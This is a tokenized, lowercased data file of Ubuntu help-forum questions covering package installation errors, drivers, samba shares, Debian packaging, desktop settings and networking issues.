473378	installing a software/wirehsark on ubuntu 11.10	i 'm trying to install wireshark on my ubuntu 11.10 ( kernel 3.0.0-12-generic-pae ) via a proxy , but fail . i 've tried the usual apt-get : me @ myubuntupc : ~ $ sudo apt-get install wireshark reading package lists ... done building dependency tree reading state information ... done the following packages were automatically installed and are no longer required : libfolks-telepathy22 libio-string-perl libunity4 libnux-0.9-common diffstat gir1.2-vte-0.0 libnux-0.9-0 intltool-debian libclass-accessor-perl patchutils g++-4.5 libpst4 linux-headers-2.6.38-15-generic libapt-pkg-perl libboost-serialization1.42.0 libfolks22 libnet-domain-tld-perl libparse-debianchangelog-perl gettext linux-headers-2.6.38-15 libgwibber1 libsub-name-perl libipc-run-perl libnet-ip-perl libstdc++6-4.5-dev libnet-dns-perl gir1.2-appindicator-0.1 liboverlay-scrollbar-0.1-0 libedata-cal1.2-10 libedata-book1.2-8 libio-pty-perl libunistring0 libunity-misc0 libdigest-hmac-perl libemail-valid-perl lintian use 'apt-get autoremove ' to remove them . the following extra packages will be installed : libc-ares2 libsmi2ldbl libwireshark-data libwireshark1 libwiretap1 libwsutil1 wireshark-common suggested packages : snmp-mibs-downloader wireshark-doc the following new packages will be installed : libc-ares2 libsmi2ldbl libwireshark-data libwireshark1 libwiretap1 libwsutil1 wireshark wireshark-common 0 upgraded , 8 newly installed , 0 to remove and 10 not upgraded . need to get 12.8 mb of archives . after this operation , 49.5 mb of additional disk space will be used . do you want to continue [ y/n ] ? y warning : the following packages can not be authenticated ! libsmi2ldbl libwireshark-data libc-ares2 libwsutil1 libwiretap1 libwireshark1 wireshark-common wireshark install these packages without verification [ y/n ] ? y err http : //archive.ubuntu.com/ubuntu/ oneiric/universe libsmi2ldbl i386 0.4.8+dfsg2-4 404 not found err http : //archive.ubuntu.com/ubuntu/ oneiric/universe libwireshark-data all 1.6.2-1 404 not found err http : //archive.ubuntu.com/ubuntu/ oneiric/main libc-ares2 i386 1.7.4-1 404 not found err http : //archive.ubuntu.com/ubuntu/ oneiric/universe libwsutil1 i386 1.6.2-1 404 not found err http : //archive.ubuntu.com/ubuntu/ oneiric/universe libwiretap1 i386 1.6.2-1 404 not found err http : //archive.ubuntu.com/ubuntu/ oneiric/universe libwireshark1 i386 1.6.2-1 404 not found err http : //archive.ubuntu.com/ubuntu/ oneiric/universe wireshark-common i386 1.6.2-1 404 not found err http : //archive.ubuntu.com/ubuntu/ oneiric/universe wireshark i386 1.6.2-1 404 not found failed to fetch http : //archive.ubuntu.com/ubuntu/pool/universe/libs/libsmi/libsmi2ldbl_0.4.8+dfsg2-4_i386.deb 404 not found failed to fetch http : //archive.ubuntu.com/ubuntu/pool/universe/w/wireshark/libwireshark-data_1.6.2-1_all.deb 404 not found failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/c/c-ares/libc-ares2_1.7.4-1_i386.deb 404 not found failed to fetch http : //archive.ubuntu.com/ubuntu/pool/universe/w/wireshark/libwsutil1_1.6.2-1_i386.deb 404 not found failed to fetch http : //archive.ubuntu.com/ubuntu/pool/universe/w/wireshark/libwiretap1_1.6.2-1_i386.deb 404 not found failed to fetch http : //archive.ubuntu.com/ubuntu/pool/universe/w/wireshark/libwireshark1_1.6.2-1_i386.deb 404 not found failed to fetch http : //archive.ubuntu.com/ubuntu/pool/universe/w/wireshark/wireshark-common_1.6.2-1_i386.deb 404 not found failed to fetch http : //archive.ubuntu.com/ubuntu/pool/universe/w/wireshark/wireshark_1.6.2-1_i386.deb 404 not found e : unable to fetch some archives , maybe run apt-get update or try with -- fix-missing ? according to the last line , i tried to run apt-get update : me @ myubuntupc : ~ $ sudo apt-get update ign http : //extras.ubuntu.com oneiric inrelease ign http : //extras.ubuntu.com oneiric release.gpg ign http : //archive.canonical.com oneiric inrelease ign http : //extras.ubuntu.com oneiric release ign http : //extras.ubuntu.com oneiric/main sources/diffindex ign http : //extras.ubuntu.com oneiric/main i386 packages/diffindex ign http : //extras.ubuntu.com oneiric/main translationindex hit http : //archive.canonical.com oneiric release.gpg hit http : //archive.canonical.com oneiric release ign http : //archive.ubuntu.com oneiric inrelease err http : //extras.ubuntu.com oneiric/main sources 404 not found [ ip : 15.16.17.18 81 ] err http : //extras.ubuntu.com oneiric/main i386 packages 404 not found [ ip : 15.16.17.18 81 ] ign http : //extras.ubuntu.com oneiric/main translation-en hit http : //archive.canonical.com oneiric/partner sources hit http : //archive.canonical.com oneiric/partner i386 packages ign http : //archive.ubuntu.com oneiric release.gpg ign http : //archive.canonical.com oneiric/partner translationindex ign http : //archive.ubuntu.com oneiric release ign http : //archive.ubuntu.com oneiric/main sources/diffindex ign http : //archive.canonical.com oneiric/partner translation-en ign http : //archive.ubuntu.com oneiric/universe sources/diffindex ign http : //archive.ubuntu.com oneiric/restricted sources/diffindex ign http : //archive.ubuntu.com oneiric/multiverse sources/diffindex ign http : //archive.ubuntu.com oneiric/main i386 packages/diffindex ign http : //archive.ubuntu.com oneiric/universe i386 packages/diffindex ign http : //archive.ubuntu.com oneiric/restricted i386 packages/diffindex ign http : //archive.ubuntu.com oneiric/multiverse i386 packages/diffindex ign http : //archive.ubuntu.com oneiric/main translationindex ign http : //archive.ubuntu.com oneiric/multiverse translationindex ign http : //archive.ubuntu.com oneiric/restricted translationindex ign http : //archive.ubuntu.com oneiric/universe translationindex err http : //archive.ubuntu.com oneiric/main sources 404 not found [ ip : 1.2.3.4 81 ] err http : //archive.ubuntu.com oneiric/universe sources 404 not found [ ip : 1.2.3.4 81 ] err http : //archive.ubuntu.com oneiric/restricted sources 404 not found [ ip : 1.2.3.4 81 ] err http : //archive.ubuntu.com oneiric/multiverse sources 404 not found [ ip : 1.2.3.4 81 ] err http : //archive.ubuntu.com oneiric/main i386 packages 404 not found [ ip : 1.2.3.4 81 ] err http : //archive.ubuntu.com oneiric/universe i386 packages 404 not found [ ip : 1.2.3.4 81 ] err http : //archive.ubuntu.com oneiric/restricted i386 packages 404 not found [ ip : 1.2.3.4 81 ] err http : //archive.ubuntu.com oneiric/multiverse i386 packages 404 not found [ ip : 1.2.3.4 81 ] ign http : //archive.ubuntu.com oneiric/main translation-en ign http : //archive.ubuntu.com oneiric/multiverse translation-en ign http : //archive.ubuntu.com oneiric/restricted translation-en ign http : //archive.ubuntu.com oneiric/universe translation-en w : failed to fetch http : //extras.ubuntu.com/ubuntu/dists/oneiric/main/source/sources 404 not found [ ip : 15.16.17.18 81 ] w : failed to fetch http : //extras.ubuntu.com/ubuntu/dists/oneiric/main/binary-i386/packages 404 not found [ ip : 15.16.17.18 81 ] w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/oneiric/main/source/sources 404 not found [ ip : 1.2.3.4 81 ] w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/oneiric/universe/source/sources 404 not found [ ip : 1.2.3.4 81 ] w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/oneiric/restricted/source/sources 404 not found [ ip : 1.2.3.4 81 ] w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/oneiric/multiverse/source/sources 404 not found [ ip : 1.2.3.4 81 ] w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/oneiric/main/binary-i386/packages 404 not found [ ip : 1.2.3.4 81 ] w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/oneiric/universe/binary-i386/packages 404 not found [ ip : 1.2.3.4 81 ] w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/oneiric/restricted/binary-i386/packages 404 not found [ ip : 1.2.3.4 81 ] w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/oneiric/multiverse/binary-i386/packages 404 not found [ ip : 1.2.3.4 81 ] e : some index files failed to download . they have been ignored , or old ones used instead . but it does n't help . any idea ? imho the fact that it successfully reaches some of the urls indicates that it 's not a proxy problem . note : originally , 15.16.17.18 is a different address than 1.2.3.4 .
473384	how do i list the non-default settings in ccsm ?	does anyone know how to extract all non-default settings from ccsm ? i use a few computers and finally managed to set up one of them just the way i like it . now i want all non-default settings listed somehow so i can apply them to the other computers . i guess i could do a backup of the ~/.config directory , reset everything and run a diff with the backed up directory . i was hoping someone could know a better way of doing this .
473390	why does `` a=10 echo $ a '' not print 10 ?	this command : a=10 echo $ a prints an empty line . why not 10 ? why does n't the in-place temporary environment setting work ? i want to know the reason and explanation rather than solution . i used lang=c gcc ... to force gcc use the fallback language ( english ) instead of the system language ( chinese ) . so i assume a var=value prefix will setup a temporary environment for the command following it . but it looks like i have some misunderstanding .
473391	ubuntu gnome lock screen hangs when qt creator or virtualbox is running	the slide lock hangs when qt creator or virtualbox is running , and the pc is locking itself after 5 minutes . the other apps are running in the background , e.g . the spotify play the music well . i 've tried to kill the gnome processes from the terminal ( alt+f1 ) and this worked , but caused some issues ... what do you think , what is the joint part of qt creator , and the virtualbox , or how can i solve this issue ? os : ubuntu 14.04 gui : gnome 3.12 update : i faced the same issue when the calibre server gui is running .
473393	why wo n't ubuntu tweak delete my thumbnail cache ?	in ubuntu tweak 0.8.7 which is installed in my ubuntu 14.04 lts running unity i could not delete a particular file called 'fail ' in the thumbnail cache . i am actually trying to remove that file with the 'janitor ' feature that is available with ubuntu tweak . every time i try deleting that file ubuntu tweak crashes ( i.e . closes ) . why does this happen and how to delete it ? by the way i could delete every other thumbnail cache file and also other kind of cache except this 'fail ' file . below is a screen shot : -
473397	ca n't access shares with samba in red hat from kubuntu 14.04 , windows pc 's do access	i have a network with windows 's xp and windows 7 pcs , and a red hat linux server . recently i 've installed kubuntu 14.04 on a pc . from windows pcs i can access to samba shares on the server but i ca n't with the kubuntu one . i 've done in kubuntu : sudo apt-get install samba system-config-samba cifs-utils winbind i 've tried by konkeror with smb : // '' server ip '' the smb.conf in red hat is : [ global ] log file = /var/log/samba/ % m.log printer = hpdeskjet5150 load printers = yes write list = @ alumnos , @ publico , @ profesores username map = /etc/samba/user.map encrypt passwords = yes dns proxy = no writeable = yes server string = samba server password server = none path = /var/spool/samba workgroup = centro os level = 20 valid users = profe01 , profe02 , @ alumnos , @ profesores , @ publico printcap name = /etc/printcap create mode = 777 security = user max log size = 50 directory mode = 777 [ homes ] browseable = no writeable = yes wide links = no path = comment = home directories create mode = 740 directory mode = 740 [ printers ] printer = printer comment = all printers browseable = no printable = yes [ sala de lectura ] comment = carpeta para que profesores coloquen prรกcticas read list = @ alumnos path = /home/sala de lectura write list = usuario , usuarioftp , @ usuario , @ usuarioftp [ publico ] comment = carpeta para compartir profesores y alumnos path = /home/publico [ profesores ] comment = con permisos solo para profesores valid users = profe01 , @ profesores path = /home/profesores write list = @ profesores and the smb.conf in kubuntu is : [ global ] workgroup=centro server string = samba server wins support=yes wins server=10.1.136.1 dns proxy = no # # # networking # # # name resolve order = lmhosts wins bcast host # # # authentication # # # server role =standalone server map to guest = bad user
473399	how to add a mounted iso to software packages ?	with aptoncd i created an iso file , then mounted that file with mount -o loop to /media/mydir . i can now see its content and browse through its content . the full command is as below : sudo mount ~/downloads/aptoncd-2014-05-28-cd1.iso /media/isonarmafzar/ -t iso9660 -o loop the problem is that i want to see this mounted block in software & updates section to select it and install softwares from iso file rather than internet :
473401	kubuntu does n't show logout or shut down or restart prompt dialog ?	my main installation is kubuntu . then , recently i installed several others des like gnome-flashback , unity , gnome 3 , and xfce . at the beginning , everything is okay . but now , i 've got a little problem with logout and shutdown/restart . normally , when i try to logout by clicking logout option in the kickoff , a new prompt dialog will appear to confirm the logout . but , now i do n't see the prompt anymore . i have two user account in my kubuntu . the problem is not occured in the other user .
473402	how to invoke a kde application with another language ( equivalent of language=c ) ?	invoking gnome applications with lanuage=c application in a terminal seems to work fine ( i 've not yet experienced difficulties ) , i assume it is a specified ( gnome ) behavior . what would be the equivalent way to controll language of kde applications with a shell variable ( not necessarily invoked in a kde desktop , e.g . in unity ) ?
473409	how do i make new nautilus windows show the same folder as the original window ?	i want to achieve the following : i have a nautilus windows showing the /foo/bar dir . i hit ctrl+n ( new window ) . i want the new window to show /foo/bar instead of my home dir .
473410	accidentally deleted grub partition	i deleted the partition responsible for boot loading to the os . and going forward when i start my pc up it only loops . is there any link or procedure that can help me recover the partition or re-install grub
473412	will ubuntu work for a windows surface 2	i 'm new to linux and want to install ubuntu on my surface 2 all i want to know is . is this possible ? please can i have an answer from someone who has done this so i know it will work .
473414	ubuntu 14.04 and amd radeon hd 7670m overheat problem	i had earlier been running on ubuntu 13.04 with the amd radeon hd 7670m graphics driver with the driver installed as given in what is the correct way to install proprietary ati catalyst video drivers ( fglrx ) directly from amd ? . recently i installed ubuntu 14.04 . the amd support website `` http : //support.amd.com/en-us/download/desktop ? os=linux % 20x86_64 # amd-catalyst-packages '' shows 2 drivers - their beta driver and the catalyst 14.4 and both show my radeon hd 7600m series as being supported in the release notes . but when i tried installing either , i am getting an error that my graphics card is not supported . i even tried the driver i was earlier running on in ubuntu 13.04 , but that too is now giving the same error . finally i installed a proprietary driver found under additional hardware and selected the intel graphics card under switchable graphics in the catalyst centre . my current laptop temperature is around 61 c and even slightest computations are taking the temp to as high as 72 c . i donot care about performance - all i care is somehow to reduce my laptop temperature - anyhow - even i tried switching the amd card off using vgaswitcheroo , but i found that since kernel 3.12 there is dynamic power management and no way to switch the card completely off . the output of my lspci | grep vga is as follows now 00:02.0 vga compatible controller : intel corporation 3rd gen core processor graphics controller ( rev 09 ) 01:00.0 vga compatible controller : advanced micro devices , inc. [ amd/ati ] thames [ radeon hd 7500m/7600m series ] ( rev ff ) i donot want to switch back to 13.04 as 14.04 is much better . also in windows [ yes , my laptop is dual booted with windows 8 ] , the core temp is around 54 . please suggest if there is a workaround to somehow control the heating . update : i recently got my laptop cleaned by a professional . by cleaning , i mean he took out the fan and manually cleaned it by opening it .. and to my utter surprise the whole fan was almost blocked with dust .. after the cleaning , now the temperature of my laptop is very stable and around 50 c .. i guess the overheating due to radeon drivers was not the root cause ...
473420	ubuntu 14.04 nvidia 331.38 chrome renders with bugs	ubuntu 14.04 x64 chrome 35.0.1916.114 using nvidia binary driver 331.38 ( also tried x.org x server nouveau ) two monitors both in unity and gnome chrome displays grey rectangles , on scroll it sometimes leave some rectangular areas non-updated or does n't remove old rectangles , but writes new text as if it was a new layer above the old texts . firefox and chromium did n't show this bug . the screenshot : tried : changing hardware acceleration in chrome , using the nvidia or x.org drivers - in all possible four combination , including a cold reboot between the settings changes . ideas checked : turned off all extensions in chrome . after this chrome started crashing upon startup . uninstalled google-chrome-stable using dpkg , deleted ~/.cache/google-chrome and ~/.config/google-chrome ( only backed up sessionbuddy database ) added google 's repo to the repo list , installed from it . with a fresh install still there are render bugs . so i enabled sessionbuddy and flashcontrol extensions , since there 's no evidence they affect this behaviour . checked if there 's ulimit - it says 'unlimited ' . the probability of rendering bugs increase with the number of tabs . some tabs go completely grey and i can only refresh them or close . also i 've found chrome flags setting with lots of flags for render/gpu/hardware acceleration . did n't try playing with them yet . probably there 's some gpu memory limit per app/process ? or , maybe , other options ? upd : the bug disappeared next day but emerged again today . seems like the bug arises when i have more than 13 windows with more than 100 tabs total . seems like it hits some memory/gpumem limits and the problem comes in play . when i close some tabs and join some windows the bug disappears after the f5 refresh . i closed and merged windows to 79 tabs and 7 windows total and the bug disappeared . any ideas ?
473421	audio editor that can add an echo effect	i want to know which is the best audio editor for linux based operating systems because i have many religious poems which are to be edited and enhanced with echo . can anyone suggest me an audio editor that can add such an echo effect ?
473422	rabbitcvs no context menus in nautilus	i am using ubuntu 14.04 and have installed rabbitvcs via the synaptic package manager ( rabbitvcs-cli , rabbitvcs-gedit and rabbitvcs-nautilus ) . the nautilus file manager is showing icons on the appropriate folders but there is no svn menu when i right click the folders . i have rebooted . i have searched and worked on this problem for some time now and i am no further along . one suggestion was to install rabbitvcs via the ppa but i am having problems doing that because i am behind a proxy server and i ca n't seem to access the keyserver - that is another problem i spent quite some time on ! does anybody have any suggestions for me ? am fairly amateur at ubuntu so not sure where to go from here . thanks .
473424	apple wireless mouse will not pair	apple magic mouse only appears in bluetooth new device setup for a fraction of a second , then disappears . how do i proceed ?
473427	are all pages of a process loaded in swap file / partition ?	`` swap space is the area on a hard disk which is part of the virtual memory of your machine , which is a combination of accessible physical memory ( ram ) and the swap space '' . according to a user now , the virtual memory should hold all the pages of his processes . my question is whether on running a process , are all the pages of a process loaded in the swap space from their original location in hard disk ? what are the factors that determines when a page will be loaded in the swap space ?
473428	problem in installing amd driver radeon hd 5460	i tried to install my gpu in ubuntu 12.04 with this link what is the correct way to install proprietary ati catalyst video drivers ( fglrx ) directly from amd ? but when i type this command line : $ sudo aticonfig -- initial i got this err : aticonfig : no supported adapters detected what should i must to do ? any suggestion about this ? i use ubunto 12.04 and hp pavilion dm4-1060ea note book and ati radeon hd5460 i used this command to find out the model of my gpu card : $ lspci | grep vga and showed me these : 00:02.0 vga compatible controller : intel corporation core processor integrated graphics controller ( rev 02 ) 01:00.0 vga compatible controller : advanced micro devices [ amd ] nee ati manhattan [ mobility radeon hd 5400 series ] thanks hamid
473429	debuild failed at dh_install with cp : can not stat `debian/tmp//path/to/install/bin/ ' : no such file or directory	i am creating a binary package for local usage by reading http : //chat.stackexchange.com/transcript/message/1313226 # 1313226 chat session . i followed the steps mentioned in the list . my environment : ubuntu 12.04 project : makefile based c++ project which contains several sub directories and creating several shared libraries . below are the steps followed . create a gpg key using gpg -- gen-key create necessary directories for packaging ( folder for package with name-version , debian sub folder ) and run dh_make -- createorig in console . this step generated required files for packaging inside debian folder edit necessary files in ./debian folder list of files in ./debian folder source //folder compat rules copyright changelog control install below are the contents of important files . $ cat control source : cscore section : misc priority : extra maintainer : dwft78 < dwft78 @ motorolasolutions.com > build-depends : debhelper ( > = 8.0.0 ) , autotools-dev standards-version : 3.9.2 homepage : < insert the upstream url , if relevant > package : cscore architecture : any depends : $ { shlibs : depends } , $ { misc : depends } description : corescanner corescanner for ubuntu-12.04 $ cat install /opt/motorola-scanner/bin/ this is where the binary files should be installed . cat changelog cscore ( 1.0-1 ) precise ; urgency=low * initial release ( closes : # nnnn ) < nnnn is the bug number of your itp > -- name < name @ xxx.com > wed , 28 may 2014 14:16:29 +0530 $ cat rules # ! /usr/bin/make -f # -*- makefile -*- # sample debian/rules that uses debhelper . # this file was originally written by joey hess and craig small . # as a special exception , when this file is copied by dh-make into a # dh-make output file , you may use that output file without restriction . # this special exception was added by craig small in version 0.37 of dh-make . # uncomment this to turn on verbose mode . # export dh_verbose=1 % : dh $ @ finally i run debuild command but i got bellow error . find /home/dwft78/project/cscore/cscore-1.0/lib -name `` libcs* '' -type f -exec cp -f { } /home/dwft78/project/cscore/cscore-1.0/debian/cscore/opt/motorola-scanner//bin \ ; find /home/dwft78/project/cscore/cscore-1.0/lib -name `` libcs* '' -type l -exec cp -rf { } /home/dwft78/project/cscore/cscore-1.0/debian/cscore/opt/motorola-scanner//bin \ ; make [ 1 ] : leaving directory `/home/dwft78/project/cscore/cscore-1.0' dh_install cp : can not stat `debian/tmp//opt/motorola-scanner/bin/ ' : no such file or directory dh_install : cp -a debian/tmp//opt/motorola-scanner/bin/ debian/cscore///opt/motorola-scanner/ returned exit code 1 make : *** [ binary ] error 2 dpkg-buildpackage : error : fakeroot debian/rules binary gave error exit status 2 actually there is no folder created called tmp inside debian folder . debhelper noted the status of debuild command execution it has continued till dh_install level . output files also created excepting above set of files . $ cat cscore.debhelper.log dh_auto_configure dh_auto_build dh_auto_test dh_prep dh_installdirs dh_auto_install please somebody help to go forward . -thanks .
473431	ubnldr.mbr is missing dual boot	as i do n't have access to a usb or cd , i have tried to frugal install ubuntu onto my hdd , using unetbootin . once turning on i find the dual boot menu to select the os , and attempt to boot ubuntu , with no avail . an error appears saying windows failed to start.a recent hardware or software problem might be the case . it then says file : ubnldr.mbr status : 0xc00007b . does anyone know a solution ?
473433	rabbitsvn deleted **all** my folders ?	i was working with rabbitsvn and trying to export a file from an older revision , when suddenly all programs in the background just shut down . i go to my `` home '' -folder to find out that all ( ! ! ) my folders and data except a single one has been deleted . not only that , many of my programs have also been deleted ( like dropbox ) + firefox was reset , so i lost all my bookmarks and active logins . my unity-launcher was also reset . how on earth is this possible ? what should i do to get my stuff back ? ! ? i 'm really close to jumping out the window ! ! ! ! ! ! they are not present in the trash and not hidden .
473434	symbolic links : why are they so bad ?	why is using symbolic links to change the default python version on ubuntu considered as being unsafe ? i read this information on several forums but did not find an answer as to why is this so .
473444	panel with apps from left to the bottom ?	is it possible to move the bar with the apps on the left corner to the bottom ? like mac os ?
473447	scripting gnome image viewer in a dual screen setup	i am attempting to use the eye of gnome command to open two instances of the image viewer on two separate displays . trouble is , if i use the command : eog -s -- display=dvi-0 image.jpg it states it can not open the display ( my assumption is that it is referring to x-displays ) . is there a way to have one instance open on each screen ?
473453	deb package : shell script with debconf does not show input dialog	the following config script inside control.tar.gz # ! /bin/sh -e . /usr/share/debconf/confmodule db_fset mailadmin/database_host seen false db_clear db_purge db_input medium mailadmin/database_host || true db_go db_get mailadmin/database_host echo `` $ ret '' > /tmp/from_config_script.txt exit 0 with the template template : mailadmin/database_host type : string description : the database server 's host name or ip address . ( file templates ) does not show an input dialog when i install the package using dpkg -i , and when i run it from the command line as well . instead it writes `` localhost '' to /tmp/from_config_script.txt , even though this default value is not part of the template file any more . i never ever saw the input popup . the input popup is what i am trying to achieve . i removed the package with apt-get purge mailadmin , but even purge did not clear this default value . what can i do ?
473454	can not run 14.04 after update - system program problem detected	i just installed fresh updates and this is what happend after that : http : //youtu.be/vcfj3iw04du
473458	how to make charles proxy server accessible externally ?	i 'm trying to use http : //www.charlesproxy.com/ to check what requests an iphone app is sendins to a server . the concept is to set the proxy on the iphone to charles and start recording . the configuration is working on a mac but i would like to have it working on my ubuntu 14 lts . starting and installing works fine . i can also capture communication from my browser on ubuntu but the proxy server is not accessible externally . i tried accessing it with an android and iphone but i get a proxy server error . iptables are not changed ufw is inactive nmap lists the port as open . i have no idea where to go next . any suggestions ?
473459	ubuntu 14.04 lts is making a weird strange sound like radio frequency	i recently updated to ubuntu 14.04 lts and i am having this issue ever since , a weird strange sound like radio frequency but this does n't affect any other sound , i can still hear other sounds like music with this weird sound playing in the background . this comes and goes , i do n't know how it is triggered and how it goes . any ideas ? this happens on the laptop speakers and headphones . laptop specs : dell - inspiron 15-3521 memory : 3.8 gib processor : intel® core™ i3-2375m cpu @ 1.50ghz × 4 graphics intel® sandybridge mobile x86/mmx/sse2 os type : 32-bit disk 335.3 gb and the following application was running at the time this happened : google chrome chromium web browser thunderbird mail netbeans ide 7.4 home folder text editor filezilla skype dropbox chrome - notifications
473461	ubuntu 14.04 on virtualbox wo n't use the full screen	i have ubuntu 14.04 installed on a windows 8 machine . at first 14.04 was awesome , used up my entire screen , and i could use it as the main machine . then ubuntu updated , and i lost my nice beautiful full screen . now it is back to acting like 12.04 or the 13 's , and the wonderfulness that was trusty tahr has gone away , how can i get that back ? how can i roll-back the latest update so i could have my computer back ?
473463	desktop broken after standard ubuntu updates	a popup showed up on my desktop for the standard updates for ubuntu , and i selected the option to install these and then let it reboot . now my desktop manager does not start , and i can only use the command line from ubuntu linux . i tried selecting `` previous linux versions '' from grub , and although it displays the desktop system , it goes in an infinite loop at the login and never actually starts -- it flashes the nvidia logo and another logo each time . i have a list of the packages installed in /var/log/apt/history.log but am not having an easy time getting it to paste here -- i ca n't copy and paste in terminal only mode ( and am using windows on another computer for this post , and i ca n't seem to read from my usb stick from command-only mode . here is the general output from running some commands to start the package manager ( retyped by hand and may have typos ) : # startx xauth : file /root/xauthority does not exist x.org x server 1.11.3 release date 2011-12-=16 x protocol version 11 , revision 0 build operating system : linux 2.6..42-37-generic x86_64 ubuntu current operating system : linux datahead-g750jw 3.11.0-22-=generic # 38~precise`-ubuntu smp fri may 26 20:47:57 utc 2014 x86_64 kernal command line : boost_image=/boot/vmlinuz. -- .311.0-22-generic.efi.signed root=uuid=d789000f3-b56e-4b2a-8751-86did944b0ca ro quiet splash vt.handoff=7 build date 16 october 2013 04 ; 41:23 pm xorg-server 2:1.11.4-oubuntu10.14 ( for technical support please see ( *i removed it due to link posting limit* ) ) current version of pixman : 0.30.2 before reporting problems , check http : //wiki.x.org to make sure that you have the latest version . markers : ( -- ) probed , ( ** ( ) from config file , ( == ) default setting , ( ++ ) from command line , ( ! ! ) notice , ( ii ) informational , ( ww ) warning , ( ee ) error , ( ni ) not implemented , ( ? ? ) unknown . ( == ) log file , `` /var.log/xorg.0.log '' , time : wed may 287 , -08:20:44 2014 ( == ) using system config directory `` /usr/share/x11/xorg.conf.d '' fatal : module nvidia not found fatal server error : no screens found please consult the x.org foundation support at http : //wiki.x.lorg for help . please also check the log file at `` /var/log/xorg.0.log '' for additional information . ddxsiggiveup : closing log server timeerated with error ( 1 ) . closing log file . xinit : giving up xinit : unable to connect to x server : no such file or directory xinit : server error if there 's a way to back out all packages in ubuntu that got installed as part of a set of updates , i 'd be fine with that . the only thing i 've found is people saying to manually downgrade each package with apt-get , and there were a reasonable number of packages installed . ubuntu version : ubuntu 12.04.4 lts i installed the updates last night . new things i 've tried : i tried it again as my own user id ( datahead ) . i had thought it got rid of the xauthority error , but trying it again now , i see it is getting a slightly different x authority error . it still fails to connect to the x server , too . i tried apt-get purge nvidia* ( which wiped out a whole lot of nivida packages ) and then did apt-get install nvidia-current . i 'm not sure what other nvidia driver ( s ) i should maybe install to get x-windows running again . they do n't seem to have an nvidia driver for the `` precise '' version of ubuntu in the apt-get repository , either . the last time i tried it , it was saying : xauth : error in locking authority file /home/datahead/.xauthority xauth : error in locking authority file /home/datahead/.xauthority x.org x server 1.11.3 ... ... ... ... ... ... ... ... ... . { not retyping this info as nothing interesting/new here ... ... ... ... ... ... ... ... ... . nvidia : could not open the device file /dev/nvidia0 ( input/output error ) . fatal server error : no screens found please consult the the x.org foundation support at hhttp : //wiki.x.org for help . please also check the log file at `` /var/log/xorg.0.log '' for additional information . ddxsiggiveup : closing log server terminated with error ( 1 ) . closing log file . xinit : giving up xinit : unable to connect to x server : no such file or directory xinit : server error xauth : error in locking authority file /home/datahead/.xauthority this line really caught my eye above : nvidia : could not open the device file /dev/nvidia0 ( input/output error ) . -- i am guessing this is the problem that needs to be resolved if i am going to fix this without doing something drastic like reinstalling ubuntu . also , when you are thrown into a command line only mode , does the battery software stop working correctly ? i found my laptop was overheating a couple times . i 'm guessing i should turn it off if i 'm in ubuntu ( command line only ) and need to move it , rather than letting it try and go in idle mode .
473465	ubuntu software not resetting or updating	i have been having trouble getting the ubuntu software center to open and when i ran the reconfigure command i get this back.. macbookpro : ~ $ sudo dpkg-reconfigure software-center updating software catalog ... this may take a moment . info : softwarecenter.db.pkginfo_impl.aptcache : aptcache.open ( ) traceback ( most recent call last ) : file `` /usr/sbin/update-software-center '' , line 169 , in < module > result = rebuild_database ( pathname ) file `` /usr/share/software-center/softwarecenter/db/update.py '' , line 1061 , in rebuild_database cache.open ( ) file `` /usr/share/software-center/softwarecenter/db/pkginfo_impl/aptcache.py '' , line 243 , in open self._cache = apt.cache ( gtkmainiterationprogress ( ) ) file `` /usr/lib/python2.7/dist-packages/apt/cache.py '' , line 105 , in __init__ self.open ( progress ) file `` /usr/lib/python2.7/dist-packages/apt/cache.py '' , line 150 , in open self._cache = apt_pkg.cache ( progress ) systemerror : e : encountered a section with no package : header , e : problem with mergelist /var/lib/apt/lists/ppa.launchpad.net_alexandre-montplaisir_ppa_ubuntu_dists_natty_deb-src_binary-i386_packages , e : the package lists or status file could not be parsed or opened . can anyone help me remove the problematic package or provide any other solutions ?
473466	can i run both ubuntu and windows ?	i 'm about to take computer science classes in college . will i be needing windows for some courses ? i want to remove windows and install ubuntu but i might need it for school . should i just have them both ? or can i install windows ( 7 or 8 ) again after replacing it with ubuntu ?
473469	how to save customized kde desktop for all desktop	guys i love to customize my kubuntu desktop and on my home computer i did something with homerun and a custom desktop theme but whenever i create a new user account that simple kde desktop comes back so how can i apply my customizations to all accounts without starting from scratch on every account .
473470	rabbitvcs icons question	in nautilus my folder shows up with a green tick icon , even though it contains files which are not committed ( these show with a red exclamation mark ) . is it correct that a folder should be marked as up to date even though it contains files which are not ? it makes it difficult for me to get an overview of which files i have changed because i have to check every single subfolder ... . ? !
473474	ping 'destination host unreachable ' when multi-homed ( wireless and usb ) to my iphone	i have a problem getting this computer to communicate with other devices on my network when i have my iphone connected to it and use both the usb and wireless modes to access the net ( ie multi-homed ) . gateway - iphone 4 pc1 ubuntu 13.10 ( this pc ) - connected to the iphone via the usb and wireless pc2 osx 10.9 - connected to the iphone via wireless only . pc3 raspbian - connected to the iphone via wireless only . i 'm using wpa2 on my network for the wireless connections . all three pcs can ping my gateway . pc2 and pc3 communicate with each other without problems . however neither can ping pc1 on either of its interfaces and always return destination host unreachable . pc1 can not ping either pc2 or pc3 and always return destination host unreachable . whilst trying to fix the access problem to/from pc1 , i found meccooll 's advice in another question asked here . so i ran tcpdump on pc1 and pc3 and can see that the arp traffic generated by pinging to/from pc1 on both machines . after reading a lot of that thread , i had a hunch that the problem might be occurring because the usb connection is not authenticated ( as it is with wireless ) . so i disconnected the iphone from pc1 and tried again using wireless only . this fixed the problem . i do n't like using wireless and only turn it on when i start up one of the other computers , and i do n't want to have to reconfigure my network each time i do this . i have music on my iphone so i ca n't plug it in to charge on a different plug . since the arp traffic is making it through to pc1 , is there a way of tweaking my network settings in ubuntu 13.10 to allow me continue using the multi-homed arrangement and communicate with the other devices ? cheers , nap ( including a 'multi-homed ' tag would have been nice , but alas i do n't have the reputation to do so . )
